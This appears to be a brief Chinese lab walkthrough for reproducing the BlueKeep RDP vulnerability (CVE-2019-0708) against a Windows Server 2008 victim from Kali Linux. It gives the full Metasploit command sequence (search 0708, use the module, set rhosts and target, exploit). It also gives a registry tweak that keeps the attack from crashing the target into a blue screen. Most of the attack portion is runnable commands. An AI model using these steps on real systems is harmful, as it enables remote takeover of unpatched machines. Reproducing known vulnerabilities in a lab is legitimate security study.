环境:
攻击机kali:2020
被害机:Server2008
攻击条件需要对方开启3389远程桌面
查看3389是否正常启动 netstat -an
修改注册表(win键+R 搜索regedit打开注册表)
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam] 复现这个漏洞必须注意:值修改为0才能稳定利用,不然极容易把受害机攻击到蓝屏
启动msfconsole
搜索漏洞模块
search 0708
use 3 #使用第三个模块
set rhosts 192.168.3.138 #设置目标地址
set target 2 #set target (0-4) 设置受害机及其架构
exploit #运行
成功
原文:https://www.cnblogs.com/ms0708/p/14001204.html